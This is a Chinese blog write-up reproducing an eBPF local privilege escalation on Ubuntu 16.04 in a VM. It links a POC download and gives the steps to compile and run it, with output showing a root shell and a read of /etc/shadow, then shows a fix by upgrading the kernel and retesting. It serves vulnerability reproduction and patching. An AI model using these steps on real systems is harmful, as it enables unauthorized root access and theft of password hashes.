Ubuntu 16.04 本地提权漏洞复现过程

一、漏洞描述
该漏洞存在于Linux内核带有的eBPF bpf(2)系统调用中,当用户提供恶意BPF程序使eBPF验证器模块产生计算错误,导致任意内存读写问题。 非特权用户可以使用此漏洞获得权限提升
二、影响范围
主要是Debian和Ubuntu版本受影响,Redhat和CentOS不受影响
Linux内核:Linux Kernel Version 4.14 ~ 4.4 
Ubuntu版本:16.04.01~ 16.04.04
root@ubuntu:~# cat /etc/issue
Ubuntu 16.04.3 LTS \n \l

root@ubuntu:~# uname -r
4.4.0-87-generic
root@ubuntu:~#
三、测试环境
VM虚拟机:vmware station 12
操作系统:ubuntu-16.04.3-server-amd64.iso
POC:  链接:https://pan.baidu.com/s/1Xwg2AF5TCASvETdrW-Vg-A 密码:b7c2
四、复现过程
step1: 查看本地id 当前的用户
u1.png

step2:下载POC到本地家目录
可以通过xshell下的xftp直接上传到服务器,不再具体讲解。
step3:安装gcc的编译环境
sudo apt-get install gcc
u2.png

step4:使用gcc进行编译 upstream44.c的文件
gcc -o sec upstream44.c
step5: 给sec文件增加一个执行权限
chmod +x sec


step6:执行sec文件,进行本地提权
ttgo2@ubuntu:~$ ./sec 
task_struct = ffff88003278aa00
uidptr = ffff8800327d3e04
spawning root shell
root@ubuntu:~#
t1.png

step7:提权成功,执行id和cat /etc/shadow
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare),1000(ttgo2)
root@ubuntu:~# cat /etc/shadow
root:!:17771:0:99999:7:::
daemon:*:17379:0:99999:7:::
bin:*:17379:0:99999:7:::
sys:*:17379:0:99999:7:::
sync:*:17379:0:99999:7:::
t2.png

五、漏洞修复
升级一下内核版本即可,具体操作如下:
 step1:找到合适的版本,最新不一定是最好
ubuntu 内核版本地址:http://kernel.ubuntu.com/~kernel-ppa/mainline/

a2.png

step2: 选择v4.8 进入,选择如下:
linux-headers-4.8.0-040800_4.8.0-040800.201610022031_all.deb 
linux-headers-4.8.0-040800-generic_4.8.0-040800.201610022031_amd64.deb
linux-image-4.8.0-040800-generic_4.8.0-040800.201610022031_amd64.deb
a3.png

step3: 下载到本地目录
wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v4.8/linux-headers-4.8.0-040800-generic_4.8.0-040800.201610022031_amd64.deb
step4:进行安装,过程如下:
ttgo2@ubuntu:~$ [b]sudo dpkg -i *.deb
[/b][sudo] password for ttgo2:
Selecting previously unselected package linux-headers-4.8.0-040800.
(Reading database ... 90554 files and directories currently installed.)
Preparing to unpack linux-headers-4.8.0-040800_4.8.0-040800.201610022031_all.deb ...
Unpacking linux-headers-4.8.0-040800 (4.8.0-040800.201610022031) ...
Selecting previously unselected package linux-headers-4.8.0-040800-generic.
Preparing to unpack linux-headers-4.8.0-040800-generic_4.8.0-040800.201610022031_amd64.deb ...
Unpacking linux-headers-4.8.0-040800-generic (4.8.0-040800.201610022031) ...
Selecting previously unselected package linux-image-4.8.0-040800-generic.
Preparing to unpack linux-image-4.8.0-040800-generic_4.8.0-040800.201610022031_amd64.deb ...
Done.
Unpacking linux-image-4.8.0-040800-generic (4.8.0-040800.201610022031) ...
Setting up linux-headers-4.8.0-040800 (4.8.0-040800.201610022031) ...
Setting up linux-headers-4.8.0-040800-generic (4.8.0-040800.201610022031) ...
Setting up linux-image-4.8.0-040800-generic (4.8.0-040800.201610022031) ...
Running depmod.
update-initramfs: deferring update (hook will be called later)
Examining /etc/kernel/postinst.d.
run-parts: executing /etc/kernel/postinst.d/apt-auto-removal 4.8.0-040800-generic /boot/vmlinuz-4.8.0-040800-generic
run-parts: executing /etc/kernel/postinst.d/initramfs-tools 4.8.0-040800-generic /boot/vmlinuz-4.8.0-040800-generic
update-initramfs: Generating /boot/initrd.img-4.8.0-040800-generic
run-parts: executing /etc/kernel/postinst.d/zz-update-grub 4.8.0-040800-generic /boot/vmlinuz-4.8.0-040800-generic
Generating grub configuration file ...
Warning: Setting GRUB_TIMEOUT to a non-zero value when GRUB_HIDDEN_TIMEOUT is set is no longer supported.
Found linux image: /boot/vmlinuz-4.8.0-040800-generic
Found initrd image: /boot/initrd.img-4.8.0-040800-generic
Found linux image: /boot/vmlinuz-4.4.0-87-generic
Found initrd image: /boot/initrd.img-4.4.0-87-generic
done

 
step4: 然后对系统进行重启,查看版本是否更新到4.8
​ttgo2@ubuntu:~$ uname -sr
Linux 4.8.0-040800-generic
step5:复测一下漏洞是否修复
ttgo2@ubuntu:~$ ./sec
task_struct = ffff9923741d5900
error: bogus uid ptr
ttgo2@ubuntu:~$

x1.png

 
到此为止全部工作已经搞定,这个过程中升级内核会有一定的风险,这里建议能重新安装就重新安装一个新的系统,我实验过程中遇到一次升级失败,导致系统无法启动,幸亏有镜像。水平有限大牛们多多指教。谢谢

0 个评论

要回复文章请先登录注册